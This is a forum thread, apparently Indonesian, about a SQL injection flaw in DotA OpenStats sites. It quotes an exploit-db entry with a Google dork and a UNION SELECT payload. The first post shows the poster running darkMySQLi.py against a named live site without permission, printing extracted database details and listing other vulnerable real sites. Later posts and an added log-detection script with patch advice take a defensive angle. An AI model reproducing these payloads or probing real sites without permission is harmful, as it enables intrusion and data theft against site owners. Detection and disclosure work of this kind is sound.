Bug in DOTA CMS sites ..
#1
At first I was just browsing db-exploit.. and came across an exploit found by fellow Indonesians ..


Quote:
=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit

http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

============
Made IN INDONESIA
Greetz for All HVM crew :)
============

looks like this is some kind of Dota site :P

I tried it right away on one of the sites that uses that vendor's CMS ..

Code:
http://rank.battlenet.web.id/index.php?id=

yup, a MySQL error showed up right away

in line with the exploit .. I found 4 columns .. I tried using d4rkMySQLi.py ...


Code:
cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol

|--------------------------------------------------|
| [email protected]                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|--------------------------------------------------|

[+] URL: http://rank.battlenet.web.id/index.php?id=1
[+] 16:03:44
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,
[+] Column Length is: 4
[+] Found null column at column #: 1,2,3,

[!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4--
[!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--

further digging turned out to go even deeper ...

Code:
[+] Gathering MySQL Server Configuration...
    Database: battlene_bot-godlike
    User: [email protected]
    Version: 5.0.92-community-log

I've already PMed the admin, hopefully it gets patched .. because as far as I know lebay.web.id is a fairly well-known game site ..

there are more .. please PM the admins ..

http://www.eliteguild.net/rank/index.php?id=
http://www.azuza.web.id/index.php?id=
http://bot.dota.web.id:8000/sexy/index.php?id=

mostly Indonesian sites.. there are still many more sites with the same hole... sigh ..
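Added example, not part of the original thread or of DotA OpenStats: a log check a site admin could run to spot the request shapes shown in the tool output above against `index.php?id=`. It assumes Apache combined log format; the sample lines are constructed, the IPs are documentation addresses, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Dec/2011:16:03:40 +0700] "GET /index.php?id=17 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Dec/2011:16:03:44 +0700] "GET /index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4-- HTTP/1.1" 200 4801 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
198.51.100.9 - - [24/Dec/2011:16:03:45 +0700] "GET /index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4-- HTTP/1.1" 200 4790 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
198.51.100.12 - - [24/Dec/2011:16:05:02 +0700] "GET /index.php?id=%27 HTTP/1.1" 200 913 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Dec/2011:16:06:10 +0700] "GET /index.php?page=top&id=42 HTTP/1.1" 200 6002 "-" "Mozilla/5.0"
"""

# client IP and request target from a combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} ')
UNION_RE = re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S)


def classify(id_value):
    """Return the reasons a decoded id value looks like an injection probe."""
    reasons = []
    if not re.fullmatch(r"[0-9]+", id_value):
        reasons.append("non-numeric id")       # the page expects a plain integer
    if UNION_RE.search(id_value):
        reasons.append("UNION SELECT in id")   # column-count probing / data extraction
    if "darkc0de" in id_value.lower():
        reasons.append("darkMySQLi marker")    # placeholder string from the tool output
    return reasons


def flag_requests(log_text):
    """Return (client_ip, decoded_id, reasons) for each suspicious index.php request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                            # not a combined-format line
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs URL-decodes the value, so %27 and '+' are normalised before matching
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reasons = classify(value)
            if reasons:
                findings.append((ip, value, reasons))
    return findings


if __name__ == "__main__":
    for ip, value, reasons in flag_requests(SAMPLE_LOG):
        print(ip, repr(value), ", ".join(reasons))
```

Hits from this check mean the `id` parameter is being probed; the fix on the application side is to accept only an integer for `id` and pass it to the database through a parameterized query.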

#2
wow, that's really kind of you, bro, wanting to let the admin know,, usually in the underground groups on FB, the index page would just end up defaced instead, bro..

#3
hehehe it's different, bro.... defacing is forbidden here :P .. if possible, help the admin so they patch ...only for Indonesia

#4
the spirit of building :)

#5
(12-24-2011, 05:41 PM)cassaprodigy Wrote: At first I was just browsing db-exploit.. and came across an exploit found by fellow Indonesians ..



so that IT in Indonesia advances.
long live Indonesian IT.
:)





